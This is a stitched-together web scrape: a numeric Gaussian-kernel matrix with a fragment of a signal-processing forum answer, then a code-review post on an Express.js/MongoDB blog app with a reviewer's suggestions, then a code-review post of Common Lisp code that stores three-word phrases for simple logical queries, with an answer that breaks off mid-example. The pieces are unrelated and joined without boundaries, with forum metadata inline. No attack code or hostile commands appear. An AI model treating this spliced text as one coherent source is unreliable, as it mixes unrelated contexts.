-40.000000 -23.086993 0.294243 5.218347 2.080704
-23.086993 -11.762411 3.077873 4.839310 1.745668
0.294243 3.077873 5.409023 3.361998 0.998325
5.218347 4.839310 3.361998 1.456020 0.365518
2.080704 1.745668 0.998325 0.365518 0.081641
Rounding should give you the final result. However, if you look closely, you'll see that it doesn't (at least not for all $(x,y)$ values). If you check the matrix on this page, you'll see that for the same $\sigma$ it is also different. So people make mistakes and they just copy from each other. | {
"domain": "dsp.stackexchange",
"id": 2364,
"tags": "image-processing, gaussian"
} |
Express.js blogging application | Question: I have put together a blogging application with Express, EJS and MongoDB.
There is a public, front-end part and a dashboard. In index.js I have:
// Bring the Dashboard
const dashboardRoute = require("./routes/admin/dashboard");
// Register Dashboard Routes
app.use('/dashboard', dashboardRoute);
// Bring the Posts Routes
const postsRoute = require('./routes/front-end/posts');
// Register Posts Routes
app.use('/', postsRoute);
In routes\admin\dashboard.js I have:
const express = require('express');
const imageUploader = require('../../utils/imageupload.js');
const validator = require('../../utils/validation.js');
const dashboardController = require('../../controllers/admin/dashboard');
const categoriesController = require('../../controllers/admin/categories');
// Express router
const router = express.Router();
// Display Dashboard
router.get('/', dashboardController.displayDashboard);
// Render add Post Form
router.get('/addpost', dashboardController.addPostForm);
// Add Post
router.post('/post/add', imageUploader.upload, validator.addPostCheck, dashboardController.addPost);
// Edit Post
router.get('/post/edit/:id', dashboardController.editPost);
// Update Post
router.post('/post/update/:id', imageUploader.upload, validator.addPostCheck, dashboardController.updatePost);
// Delete Post
router.delete('/post/delete/:id', dashboardController.deletePost);
// Display Categories
router.get('/categories', categoriesController.showCategories);
// Render add Categories Form
router.get('/categories/addcategory', categoriesController.addCategoryForm);
// Add Category
router.post('/category/add', validator.addCategoryCheck, categoriesController.addCategory);
// Edit Post
router.get('/category/edit/:id', categoriesController.editCategory);
// Update Category
router.post('/category/update/:id', validator.addCategoryCheck, categoriesController.updateCategory);
// Delete Category
router.delete('/category/delete/:id', categoriesController.deleteCategory);
module.exports = router;
I am concerned especially about the controllers "under" the dashboard (controllers\admin\dashboard.js):
const Post = require('../../models/post');
const Category = require('../../models/categories');
const {upload} = require('multer');
const {validationResult} = require('express-validator');
exports.displayDashboard = async (req, res, next) => {
const posts = await Post.find({}, (err, posts) => {
if (err) {
console.log('Error: ', err);
} else {
res.render('admin/index', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
posts: posts
});
}
}).populate('category');
};
exports.addPostForm = async (req, res, next) => {
const categories = await Category.find({}, (err, categories) => {
if (err) {
console.log('Error: ', err);
} else {
res.render('admin/addpost', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Add New Post',
categories: categories
});
}
});
}
exports.addPost = (req, res, next) => {
const form = {
titleholder: req.body.title,
excerptholder: req.body.excerpt,
bodyholder: req.body.body
};
const errors = validationResult(req);
const post = new Post();
post.title = req.body.title;
post.short_description = req.body.excerpt
post.full_text = req.body.body;
post.category = req.body.category;
if (req.file) {
post.post_image = req.file.filename;
}
if (!errors.isEmpty()) {
const categories = Category.find({}, (err, categories) => {
req.flash('danger', errors.array())
res.render('admin/addpost', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Add New Post',
categories: categories,
form: form
});
});
} else {
post.save(function(err) {
if (err) {
console.log(err);
return;
} else {
req.flash('success', "The post was successfully added");
req.session.save(() => res.redirect('/dashboard'));
}
});
}
}
exports.editPost = async (req, res, next) => {
const postId = req.params.id;
Post.findById(postId, function(err, post) {
const categories = Category.find({}, (err, categories) => {
if (err) {
console.log('Error: ', err);
} else {
res.render('admin/editpost', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Edit Post',
categories: categories,
post: post
});
}
});
});
}
exports.updatePost = (req, res, next) => {
const query = {
_id: req.params.id
}
const form = {
titleholder: req.body.title,
excerptholder: req.body.excerpt,
bodyholder: req.body.body
};
const errors = validationResult(req);
const post = {};
post._id = req.params.id;
post.title = req.body.title;
post.short_description = req.body.excerpt
post.full_text = req.body.body;
post.category = req.body.category;
if (req.file) {
post.post_image = req.file.filename;
}
if (!errors.isEmpty()) {
req.flash('danger', errors.array());
const categories = Category.find({}, (err, categories) => {
res.render('admin/editpost', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Edit Post',
categories: categories,
form: form,
post: post
});
});
} else {
Post.update(query, post, function(err) {
if (err) {
console.log(err);
return;
} else {
req.flash('success', "The post was successfully updated");
req.session.save(() => res.redirect('/dashboard'));
}
});
}
}
exports.deletePost = (req, res, next) => {
const postId = req.params.id;
Post.findByIdAndRemove(postId, function(err) {
if (err) {
console.log('Error: ', err);
}
res.sendStatus(200);
});
}
The controller concerning the categories:
const Category = require('../../models/categories');
const { validationResult } = require('express-validator');
exports.showCategories = async (req, res, next) => {
const categories = await Category.find({}, (err, categories) => {
if(err){
console.log('Error: ', err);
} else {
res.render('admin/categories', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Categories',
categories: categories
});
}
});
};
exports.addCategoryForm = (req, res, next) => {
res.render('admin/addcategory', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Add New Category',
});
}
exports.addCategory = (req, res, next) => {
var form = {
categoryholder: req.body.cat_name
};
const errors = validationResult(req);
const category = new Category();
category.cat_name = req.body.cat_name;
if (!errors.isEmpty()) {
req.flash('danger', errors.array())
res.render('admin/addcategory',{
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Add New Category',
form:form
}
);
} else {
category.save(function(err) {
if (err) {
console.log(err);
return;
} else {
req.flash('success', "The category was successfully added");
req.session.save(() => res.redirect('/dashboard/categories'));
}
});
}
}
exports.editCategory = (req, res, next) => {
const catId = req.params.id;
Category.findById(catId, function(err, category){
if (err) {
console.log('Error: ', err);
} else {
res.render('admin/editcategory', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Edit Category',
category: category
});
}
});
}
exports.updateCategory = (req, res, next) => {
const query = {_id:req.params.id}
var form = {
categoryholder: req.body.cat_name
};
const errors = validationResult(req);
const category = {};
category._id = req.params.id;
category.cat_name = req.body.cat_name;
if (!errors.isEmpty()) {
req.flash('danger', errors.array())
res.render('admin/editcategory',{
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Edit Category',
form: form,
category: category
}
);
} else {
Category.update(query, category, function(err){
if(err){
console.log(err);
return;
} else {
req.flash('success', "The category was successfully updated");
req.session.save(() => res.redirect('/dashboard/categories'));
}
});
}
}
exports.deleteCategory = (req, res, next) => {
const catId = req.params.id;
Category.findByIdAndRemove(catId, function(err){
if (err) {
console.log('Error: ', err);
}
res.sendStatus(200);
});
}
Answer: Shorthand Property Definition Notation
As I mentioned in an answer to one of your previous posts, The shorthand property definition notation can be used to simplify the lines like these where the key is the same as the name of the variable being referenced:
categories: categories,
posts: posts
To simply:
categories,
posts
Waiting with await
With async / await the code that is typically in the promise callback can be moved out- so take this section for example:
const posts = await Post.find({}, (err, posts) => {
if (err) {
console.log('Error: ', err);
} else {
res.render('admin/index', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
posts: posts
});
}
}).populate('category');
I haven’t tested this code but my presumption is that the call to .populate('category') comes after the callback where res.render() is called - so that may be a bug.
It can be like simplified to something like this:
const posts = await Post.find({}).populate('category').catch(err => {
console.log('Error: ', err);
});
res.render('admin/index', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
posts
});
Though maybe the call to populate the category needs to come after the value from Post.find({}) Is assigned to posts.
And similarly for the other functions called with await. This way the value assigned to posts from can be used properly.
Useless else keyword after return
In the callback to post.save():
if (err) {
console.log(err);
return;
} else {
req.flash('success', "The post was successfully added");
req.session.save(() => res.redirect('/dashboard'));
}
The code in the else block can be moved out because in the first case there is a return statement. This can reduce the indentation level.
variable declared with var
The answer by CertainPerformance to your previous post recommends avoiding the var keyword. Yet this code uses it:
exports.addCategory = (req, res, next) => {
var form = {
categoryholder: req.body.cat_name
};
That variable is never reassigned so it can be declared with const.
And similarly for updateCategory() - it has a variable declared with var named form that never gets re-assigned. | {
"domain": "codereview.stackexchange",
"id": 39800,
"tags": "javascript, mongodb, express.js, modules, ecmascript-8"
} |
How deep in Mars would a person not need insulation and pressure? | Question: How deep in Mars' surface would one have to go to both not need a pressurized suit and be warm enough to just wear clothes? in other words is there a dept Goldilocks where you would only need an oxygen supply?
Answer: According to this paper, there are various but enough good estimations for the temperature gradient of the Martian soil. Note, direct measurements will we have first with the next Martian lander, the InSight:
Image from here
The for us important part of this estimation is this:
Depth penetration of the annual temperature wave at $120^\circ E,
> 20^\circ N$, using data from the NASA/MSFC Mars GRAM as the surface
boundary condition and assuming a planetary heat flow of 20
$\frac{mW}{m^2}$. The snapshots of the temperature as a function of
depth are given for the models with
(a) $k_\infty = 0.02 \frac{W}{m\cdot K}$ and
(b) $k_\infty = 0.1 \frac{W}{m\cdot K}$.
Heat flows derived from the soil temperatures given in Figures 3a and
3b for models with
* (c) $k_\infty = 0.02 \frac{W}{m\cdot K}$ and
* (d) $k_\infty = 0.1 \frac{W}{m\cdot K}$.
The snapshots (gray lines) show the local heat flow. The area inside
the envelope (black lines) represents possible heat flow values that
can be obtained by a single measurement. The heat flows derived from
the annual mean temperatures are indicated by squares. Note that in
order to calculate heat flows, the thermal conductivity was assumed to
be known.
What we can see here, is similar to the Earth:
there are significant temperature differences in the upper soil, depending on the geographical position, yearly and daily cycles
however, around from 4m depth, the soil temperature is roughly constant.
Extrapolating the upper two graphs, we can expect a pleasant earth-like temperature not very deeply, roughly around 20-40 m.
However, according to this answer, the Earth-like pressure happens much deeper, around 20-40 km below the surface. This answer uses the Barometric formula to calculate the required depth, which is a very good estimation. It seems probably unreachable with the current technology, although it is not very far away from it: the main problems of the digging of deep holes are
cooling
water incursions
The first is much easier, the second is non-existant on the Mars.
Note, the Martian atmosphere is mainly carbon dioxide, thus spacesuits won't be needed, but some oxygen tanks still will be.
There is no such depth where both the temperature and the pressure would be comfortable for us.
P.s. actually, 16% pure oxygen is already enough for us to breathe, which makes the required depth to around 10-15 km. | {
"domain": "astronomy.stackexchange",
"id": 3112,
"tags": "planetary-atmosphere, mars, heat"
} |
Relativistic mass and relativistic charge | Question: Let a particle with a mass $m$ and a charge $q$ move with a speed $v$ close to the speed of light ($v\approx c$). Then, the special theory of relativity tells us the particle's relativistic mass would increase in a factor $\gamma = \frac{1}{\sqrt{1-(v/c)^2}}$. Nonetheless, the particle's charge would not be modified (at least that is what my Optics textbook, Óptica Electromagnética, Cabrera) states. This has me thinking, if an observer is located in an inertial frame of reference from where he can measure the speed of the particle, then said observer will also perceive the particle's mass is greater. Why won't he perceive any alterations in the particle's charge?
Answer: The way we deal with electric charge in relativity is to introduce it as part of a complete set of ideas about electromagnetic fields and charged bodies. You are quite right that in this formulation the amount of electric charge on a given body is independent of the inertial frame in which the body may be being observed. We say it is 'invariant' or (to be clear) 'Lorentz invariant'. The word 'invariant' means the same, at any given event, no matter what inertial reference frame may be being adopted to define spatial and temporal coordinates.
Another important Lorentz invariant property of any particle is the rest mass $m$. In terms of this quantity, the momentum of a body moving at speed $v$ is
$$
p = \gamma m v. \tag{1}
$$
Our thinking is clearer if we regard $m$ as the important mass-related property here, not $(\gamma m)$. The equation setting out how the momentum relates to a vector force is
$$
{\bf f} = \frac{d {\rm p}}{dt} \tag{2}
$$
Hence
$$
{\bf f}
= \frac{d\gamma}{dt}m {\bf v} + \gamma \frac{dm}{dt}{\bf v} + \gamma m \frac{d{\bf v}}{dt}.
$$
For forces from electromagnetic fields the rest mass doesn't change as the particle accelerates, so this simplifies to
$$
{\bf f} = \frac{d\gamma}{dt}m {\bf v} + \gamma m \frac{d{\bf v}}{dt}.
$$
Notice that this is not $(\gamma m)$ times the acceleration.
I have mentioned this to give you some idea of why it is that it doesn't help much to gather the Lorentz factor and the rest mass together and call the combination by a name such as 'relativistic mass'. It's better to think of the situation as a given rest mass and then a momentum related to that by the formula (1). The important point is that the rest mass is the same in all inertial frames. That means that in order to find the momentum in any given frame you have to use the combination $\gamma v$ (which can depend on the frame) and multiply by the same $m$ no matter which frame it is.
Once you have settled that idea, you will also see that the ratio of charge to rest mass, for any given body, is the same in all inertial frames. When a body of given charge and rest mass is accelerated by an electric field, the charge and rest mass stay fixed while the momentum increases. The degree to which the momentum is sensitive to force is also fixed (see equation (2)). But as $\gamma$ gets larger the acceleration $d{\bf v}/dt$ gets smaller, for any given force. | {
"domain": "physics.stackexchange",
"id": 100178,
"tags": "electromagnetism, special-relativity, charge, mass, inertial-frames"
} |
Why won't my door close in the winter? | Question: Please, take this question seriously, because this is a real problem to me. I have a door in my flat. A closet door, to be specific. And there is a problem with it.
In the summer everything is ok, the standard wood door opens and closes as predicted, but in the winter time it drives me crazy! It just won't close! Seems that it doesn't fit where it belongs. Damn door just doesn't allow me to welcome guests and take a cup of mulled wine with them.
So the question is, what physical processes are standing behind that unfitting? I believe that sun and gravity may be involved, but I don't really understand it. So, please, help. If I'll know the problem, I'll figure out a solution.
P.S Maybe it is important that I live in Kazan', Russia
Answer: I would say it has to do with humidity, since it is a wooden door. It probably gets too humid during the winter and the wood expands. If it had to do with temperature, it would be the opposite effect (it would expand during the summer when it is hot). | {
"domain": "physics.stackexchange",
"id": 14713,
"tags": "everyday-life"
} |
Hardware requirements for Linux server to run R & RStudio | Question: I want to build a home server/workstation to run my R projects. Based on what I have gathered, it should probably be Linux based. I want to buy the hardware now, but I am confused with the many available options for processors/ram/motherboards. I want to be able to use parallel processing, at least 64GB? of memory and enough storage space (~10TB?). Software wise, Ubuntu?, R, RStudio, PostgreSQL, some NOSQL database, probably Hadoop. I do a lot of text/geospatial/network analytics that are resource intensive. Budget ~$3000US.
My Questions:
What could an ideal configuration look like? (Hardware + Software)
What type of processor?
Notes:
No, I don't want to use a cloud solution.
I know it is a vague question, but any thoughts will help, please?
If it is off-topic or too vague, I will gladly delete.
Cheers B
Answer: There is no ideal configuration, for R or in general - product selection is always a difficult task and many factors are at play. I think that the solution is rather simple - get the best computer that your budget allows.
Having said that, since you want to focus on R development and one of R's pressing issues is its critical dependence on the amount of available physical memory (RAM), I would suggest favoring more RAM to other parameters. The second most important parameter, in my opinion, would be number of cores (or processors - see details below), due to your potential multiprocessing focus. Finally, the two next most important criteria I'd pay attention to would be compatibility with Linux and system/manufacturer's quality.
As far as the storage goes, I suggest considering solid state drives (SSD), if you'd rather prefer to have a bit more more speed than more space (however, if your work will involve intensive disk operations, you might want to investigate the issue of SSD reliability or consult with people, knowledgeable in this matter). However, I think that for R-focused work, disk operations are much less critical than memory ones, as I've mentioned above.
When choosing a specific Linux distribution, I suggest using a well-supported one, such as Debian or, even better, Ubuntu (if you care more about support, choose their LTS version). I'd rather not buy parts and assemble custom box, but some people would definitely prefer that route - for that you really need to know hardware well, but potential compatibility could still be an issue. The next paragraph provides some examples for both commercial-off-the-shelf (COTS) and custom solutions.
Should you be interested in the custom system route, this discussion might be worth reading, as it contains some interesting pricing numbers (just to get an idea of potential savings) and also sheds some light on multiprocessor vs. multi-core alternatives (obviously, the context is different, but nevertheless could be useful). As I said, I would go the COTS route, mainly due to reliability and compatibility issues. In terms of single-processor multi-core systems, your budget is more than enough. However, when we go to multiprocessor workstations (I'm not even talking about servers), even two-processor configurations can go over your budget easily. Some, not far away, such as HP Z820 Workstation. It starts from 2439 USD, but in minimal configuration. When you upgrade it to match your desired specs (if it's even possible), I'm sure that we'll be talking about 5K USD price range (extrapolating from the series' higher-level models). What I like about HP Z820, though, is the fact that this system is Ubuntu certified. Considering system compatibility and assuming your desire to run Ubuntu, the best way to approach your problem is to go through Ubuntu-certified hardware lists and shortlist systems that you like. Just for the sake of completeness, take a look at this interesting multiprocessor system, which in compatible configuration might cost less than from HP or other major vendors. However, it's multimedia-oriented as well as it's reliability and compatibility are unknown, not to mention that it's way over your specified budget.
In terms of R and R-focused software, I highly recommend you to use RStudio Server instead of RStudio, as that will provide you with an opportunity to be able to work from any Internet-enabled location (provided you computer will be running, obviously). Another advice that I have is to keep an eye on alternative R distributions. I'm not talking about commercial expensive ones, but about emerging open source projects, such as pqR: http://www.pqr-project.org. Will update as needed. I hope this is helpful. | {
"domain": "datascience.stackexchange",
"id": 189,
"tags": "r"
} |
Question on particles | Question: Is there any theory in which every particle can be further subdivided into any number of particles and the total number of particles any where in the space time are infinity in theory and only due to practical constraints that we are capable of observing the known particles in the current World.
Also could you please explain the nature of the two widely accepted theories which explain the small scale and large scale universe which are QP and GR repectively in the current context of the question.
Answer: You may consider every excited state of an atom $\Psi_n$ as another particle. Then their number may be infinite even in this simple example. The higher energy of the system, the higher $n$.
In QFT each particle has occupation numbers. During reactions some occupation numbers decrease, some other increase. Factually QFT equations are the balance equations governing the occupation numbers while interactions. | {
"domain": "physics.stackexchange",
"id": 364,
"tags": "mathematical-physics"
} |
Collisions in independent hashing | Question: Let $H$ be a $s$-wise independent family of hash functions from $\{1,\ldots,M\}$ to $\{1,\ldots,N\}$. It is easy to bound one collision, but are there good bounds for muliple collision ?
Answer: You can upper-bound your probability using a union bound. In particular,
$$\Pr[\exists x \in S . \phi(x)] \le \sum_{x \in S} \Pr[\phi(x)].$$
Using a union bound we obtain ${M^s \choose 2}$ terms in the sum, and each term is upper-bounded by $1/N^s$, so we find that your probability is at most
$${M^s \choose 2}/N^s.$$
If $M < \sqrt{N}$, then this probability will be at most $1/2$. If $M \gg \sqrt{N}$, then this probability is close to $1$.
(Qualitatively, this upper bound is fairly close to tight for a wide range of settings of $M,N$. I am not going to prove this fact, but you can take my word on it. So there's not much hope for a significantly better bound using some other proof technique.)
In short: as Yuval Filmus says, unless $M$ is very small, your event is actually pretty likely.
No, something stronger than $s$-independence will not help. Even if you assume that $h$ is generated uniformly at random from the set of all hash functions with the right signature (something that is not actually implementable), you don't get a much better bound.
The only plausible approach I can see is to choose a hash function $h$ that does not have any collisions at all: e.g., choose $h$ from a family of injections, or use a perfect hash. Each of these has serious shortcomings: the former requires $M<N$, and the latter typically requires you to know in advance the full set of values that you will ever compute $h$ on. | {
"domain": "cs.stackexchange",
"id": 5060,
"tags": "computability, data-structures, probability-theory, hash, hash-tables"
} |
Computational Complexity of 'Generic'/'Relaxed' Horn 3SAT | Question: Horn 3SAT are described as the 3SAT with at most one positive literal. And its in P. What about the complexity of relaxed case of 2-Horn 3SAT i.e.
Each clause is in CNF, has exactly 3 literals, with at most 2 positive literals.
Can someone please help with the reference.
Answer: Schaefer's dichotomy theorem gives you the answer. Apply it and see what you get, and let us know.
Looking at the modern formulation, in your case $\Gamma$ contains the three relations $\lnot x \lor \lnot y \lor \lnot z, x \lor \lnot y \lor \lnot z, x \lor y \lor \lnot z$. For each of these relations $R$, you have to go over the list of polymorphisms, and check whether one of them is a polymorphism of $R$. For example, to check whether the binary AND function is a polymorphism of $\lnot x \lor \lnot y \lor \lnot z$, you have to check whether
$$
(\lnot x_1 \lor \lnot y_1 \lor \lnot z_1) \land (\lnot x_2 \lor \lnot y_2 \lor \lnot z_2) \\ \Longrightarrow \lnot (x_1 \land x_2) \lor \lnot (y_1 \land y_2) \lor \lnot (z_1 \land z_2).
$$
If every $R \in \Gamma$ has one of the six polymorphisms, then your problem is in P. Otherwise, it's NP-complete. | {
"domain": "cs.stackexchange",
"id": 4483,
"tags": "complexity-theory"
} |
Texture-like measures for quantifying density of data in binary images | Question: Consider the following black-and-white image. It depicts a freehand sketch.
I wish to characterize the "density" of sketch strokes. For e.g. the hair strokes are densely grouped together. So are strokes near the wrists and the necklace stone. Other strokes are somewhat scattered and "far", e.g. the nearly vertical strokes depicting the dress.
Is there a good measure (texture-like ?) which can be used to quantify the above notion ?
Answer: I ended up using the radon transform in 8 canonical directions. I then normalized the resulting distribution and computed its entropy. The numbers seem to correlate with level of texture in the image. | {
"domain": "dsp.stackexchange",
"id": 2949,
"tags": "image-processing, filtering"
} |
Storing facts for logical questions | Question: I am writing a crude artificial intelligence program. I am happy with my program's ability to file away new word in ways that will allow logic to be done on them. Before I start expanding the logic abilities of the program I rewrote it in what I understand to be functional programming. I want a solid base before I move forward. Any critique or insight would be greatly appreciated because I believe in good programming. I have rewritten this to the point that I am cross eyed but at the moment it works.
Each word is stored in the global vocab list as an a word. some words are used as verbs or relationship words stored in the a words in assoc arrays. C words are the subjects which are placed in assoc arrays nested in the b word arrays. The (unk) words are just placeholders until an actual word is placed in the array.
; This program is used on an SBCL REPL
; this program recieves three word phrases via the LEARN function
; and stores them in symbols aranged in nested assoc arrays
; so that logical questions can be asked using the function ASK.
; The LEARN function can take lists as arguments to proces many As Bs or Cs.
; the A word is the subject. The B word is the verb or relationship and the C is the object.
; For every ABC phrase the recipical phrase is also recorded.
; If the b word does not yet have a recipical a user prompt is given.
; Synonyms are also disambiguated to one tearm to allow abreviated input and to eliminate words meaning the same thing.
(setf *vocab* '()) ; all words live here
(defun with-branch (word) (cons word (cons (list '(unk) (cons '(unk) nil))nil)))
(setf sym '())
(defun learn (a b c) ;user friendly ersion of ABCphrase to input phrases
(ABCphrase a b c "none"))
(defun ABCphrase (a b c origin) ;computer uses to input three word phrases or lists or A B and C words to build many phrases at once
(cond
((listp a)
(loop for w in a do
(ABCphrase-b w b c origin))) ;origin is to keep track of what function called ABCphrase in ordert to prevent infite loops
((not (listp a))
(ABCphrase-b a b c origin))))
(defun ABCphrase-b (a b c origin)
(cond
((listp b) ;proceses the list if b is a list
(loop for y in b do
(ABCphrase-c a y c origin)))
((not (listp b))
(ABCphrase-c a b c origin))))
(defun ABCphrase-c ( a b c origin)
(cond
((listp c) ;proceses the list if c is list
(loop for z in c do
(add-and-place-ABCphrase-words a b z origin)))
((not (listp c))
(add-and-place-ABCphrase-words a b c origin)))) ;all words are eventualy processed throuf add-and-place-ABCphrase-words
(defun add-and-place-ABCphrase-words (a b c origin)
(add-to-vocab-if-not a)(add-to-vocab-if-not b)
(add-to-vocab-if-not c)
(let ((a-resolved (word-or-synonym a b "a" ))
(b-resolved (word-or-synonym b b "b" ))
(c-resolved (word-or-synonym c b "c" )))
(add-as-b-if-not a-resolved b-resolved c-resolved origin)
(cond
((equal b-resolved 'has-synonym) ;if b is has-synonym then don't resolve the synonym
(add-as-c-if-not a-resolved b-resolved c ))
((not(equal b-resolved 'has-synonym))
(add-as-c-if-not a-resolved b-resolved c-resolved )))))
(defun add-to-vocab-if-not (word)
(cond
((not(member word *vocab*)) ;if already exists
(push word *vocab*) ;add a as a a
(setf (symbol-value word) sym))))
(defun add-as-b-if-not (a b c origin) ;ads b to assoc array inside a (unless it is already there)
(cond
((not (assoc b (symbol-value a))); if not allready in lista
(cond
((equal (symbol-value a) sym)
(setf (symbol-value a) (cons (with-branch b) nil)) )
((not(equal (symbol-value a) sym))
(push (with-branch b) (symbol-value a))))))
(cond
((not(equal origin "recipical")) ;this condition prevents an infint loop of flip flopping recipicals
(process-recipical a b c))))
; b recipical
(defun process-recipical (a b c) ; create the backward phrase frog is-colored green green is-color-of frog
(cond
((equal b 'is-recipical-of) ;this condition was necessary due to an error
(ABCphrase c 'is-recipical-of a "recipical")
(return-from process-recipical b)
((not(assoc 'is-recipical-of (symbol-value b))) ; if b does not have repical then prompt user for recipical
(format t "Please type recipical of: ")
(princ b)
(finish-output)
(let ((rec-word (get-word a b c)))
(ABCphrase c rec-word a "recipical") ;creates the recipical phrase
(ABCphrase b 'is-recipical-of rec-word "recipical") ;create prase stating recipical
(ABCphrase rec-word 'is-recipical-of b "recipical"))) ;create recipical phrase stating recipical
((assoc 'is-recipical-of (symbol-value b)) ;if b has recipical
(ABCphrase c (first(first(first(cdr (assoc 'is-recipical-of (symbol-value b)))))) a "recipical"))) ))
(defun get-word (a b c)
(let ((word (read-from-string (read-line))))
(add-to-vocab-if-not word)
(return-from get-word word)))
(defun add-as-c-if-not (a b c)
(cond
((not (assoc c (car (cdr(assoc b (symbol-value a)))))); if not in list b
(push (with-branch c) (second(assoc b (symbol-value a)))))))
(defun word-or-synonym (word b place)
(cond
((equal place "b")
(return-from word-or-synonym (resolve-word word)))
((equal place "a")
(cond
((equal b 'is-synonym)
(return-from word-or-synonym word))
((not(equal b 'is-synonym))
(return-from word-or-synonym (resolve-word word)))))
((equal place "c")
(cond
((equal b 'has-synonym)
(return-from word-or-synonym word))
((not(equal b 'has-synonym))
(return-from word-or-synonym (resolve-word word)))))))
(defun resolve-word (word)
(cond
((assoc 'is-synonym (symbol-value word))
(return-from resolve-word (first(first(first(cdr (assoc 'is-synonym (symbol-value word)))))))))
(return-from resolve-word word))
(defun ask (a b c)
(add-to-vocab-if-not a)
(add-to-vocab-if-not b)
(add-to-vocab-if-not c)
(let ((a-resolved (word-or-synonym a b "a" ))
(b-resolved (word-or-synonym b b "b" ))
(c-resolved (word-or-synonym c b "c" )))
(assoc c-resolved (cadr(assoc b-resolved (symbol-value a-resolved))))))
(learn 'is-recipical-of 'is-recipical-of 'is-recipical-of)
(learn 'is-synonym 'is-recipical-of 'has-synonym)
(learn 'syn 'is-synonym 'is-synonym)
(learn 'rec 'syn 'is-recipical-of )
(learn 'teaches 'rec 'is-taught-by)
(learn 'is-located-in 'rec 'is-location-of)
(learn 'auburn 'is-location-of '(upstairs downstairs industrial-arts-building))
(learn 'loc-of 'syn 'is-location-of)
(learn 'loc-in 'syn 'is-located-in)
(learn 'upstairs 'loc-of '(CNT-room ISS-room APM-room testing-room fish-bowl TPP-room ISTEM))
Answer: Readability
It's hard express how important it is - we write programs to be read by humans, and only at times by machines. Programming languages were designed by humans for humans, not for machines. And your responsibility is not only write code that works (somehow), but most important - code that is most clear and simple to read description of your intentions for other readers (and for yourself in the future).
Naming
It's not good idea to use names like a, b, c etc. It doesn't tell anything. And you had to describe in comments thei meanings. Call them what they are, ie:
the A word is the subject. The B word is the verb or relationship and the C is the object.
Why not call them subject-word, verb-word and object-word?
Also function names like ABCphrase, ABCphrase-b, ABCphrase-c are not very descriptive. Later you use some long, descriptive function names, why not here?
Formatting
Please make some space between function definitions.
Do not:
(defun get-word (a b c)
(let ((word (read-from-string (read-line))))
(add-to-vocab-if-not word)
(return-from get-word word)))
(defun add-as-c-if-not (a b c)
(cond
((not (assoc c (car (cdr(assoc b (symbol-value a)))))); if not in list b
(push (with-branch c) (second(assoc b (symbol-value a)))))))
(defun word-or-synonym (word b place)
Do:
(defun get-word (a b c)
(let ((word (read-from-string (read-line))))
(add-to-vocab-if-not word)
(return-from get-word word)))
(defun add-as-c-if-not (a b c)
(cond
((not (assoc c (car (cdr(assoc b (symbol-value a)))))); if not in list b
(push (with-branch c) (second(assoc b (symbol-value a)))))))
(defun word-or-synonym (word b place)
Don't put additional spaces in lists.
Do not:
(defun ABCphrase-c ( a b c origin)
Do:
(defun ABCphrase-c (a b c origin)
Do use at least one space (white character) between list elements.
Do not:
((not(member
Do:
((not (member
Indent your code properly. Wrong indentation in Common Lisp is like placing dot and comma characters in wrong places in natural language. If you focus hard, you can still try to figure out what you read, but it leads to errors and is painfull.
If you use IDE created with Lisp requirements in mind (ie Emacs), it will indent your code properly, and also every time you see your code not aligning properly - it's clear sign there is something wrong with expression.
Do not:
(let ((a-resolved (word-or-synonym a b "a" ))
(b-resolved (word-or-synonym b b "b" ))
(c-resolved (word-or-synonym c b "c" )))
(add-as-b-if-not a-resolved b-resolved c-resolved origin)
Do:
(let ((a-resolved (word-or-synonym a b "a" ))
(b-resolved (word-or-synonym b b "b" ))
(c-resolved (word-or-synonym c b "c" )))
(add-as-b-if-not a-resolved b-resolved c-resolved origin)
Descriptions
You have a lot of comments, and that's good. However in Common Lisp you can include them in your code, and refere to them in programmatic way.
In global function and variable definition you can add string with description. Later you can get those descriptions using describe. So for example if you change learn function to:
(defun learn (a b c)
"user friendly ersion of ABCphrase to input phrases."
(ABCphrase a b c "none"))
later you can ask for description on repl:
(describe #'learn)
Same goes to global variable/parameter definitions.
Bottom-Up
When you first define top functions, and later move to defining lower level functions, you force reader to skip from top to some random parts. If I read learn function, it's body doesn't tell me much. It references some other function that I haven't read yet. It would be easier to read if you place simpler functions on top. So before you define learn, first define function referenced by it, so ABCphrase. And since ABCphrase references ABCphrase-b, define it first. And so on...
Tech
global vars
You can't setf something that doesn't exist! It's an error. Use defparameter or defvar instead. And always *mark* global variables properly.
Do not:
(setf *vocab* '()) ; all words live here
(setf sym '())
Do:
(defvar *vocab* '()
"all words live here.")
(defvar *sym* '())
return
In Common Lisp you don't have to use return-from in fashion similar to return is a must. In Common Lisp function returns result of evaluating last expression. As a rule of thumb - if you are about to write return-from, stop and think, you overcomplicated something.
Do not:
(defun get-word (a b c)
(let ((word (read-from-string (read-line))))
(add-to-vocab-if-not word)
(return-from get-word word)))
Do:
(defun get-word (a b c)
(let ((word (read-from-string (read-line))))
(add-to-vocab-if-not word)
word)))
Also if add-to-vocab-if-not returns word, you don't need the last line at all.
And do not:
(defun resolve-word (word)
(cond
((assoc 'is-synonym (symbol-value word))
(return-from resolve-word (first(first(first(cdr (assoc 'is-synonym (symbol-value word)))))))))
(return-from resolve-word word))
Do:
(defun resolve-word (word)
(cond
((assoc 'is-synonym (symbol-value word))
(first(first(first(cdr (assoc 'is-synonym (symbol-value word)))))))
(t word)))
first is good, car even better
At the beginning, first look and reads much better than car. But you can chain car and cdr nicely. So use (caar instead of (first (first etc:
(defun resolve-word (word)
(cond
((assoc 'is-synonym (symbol-value word))
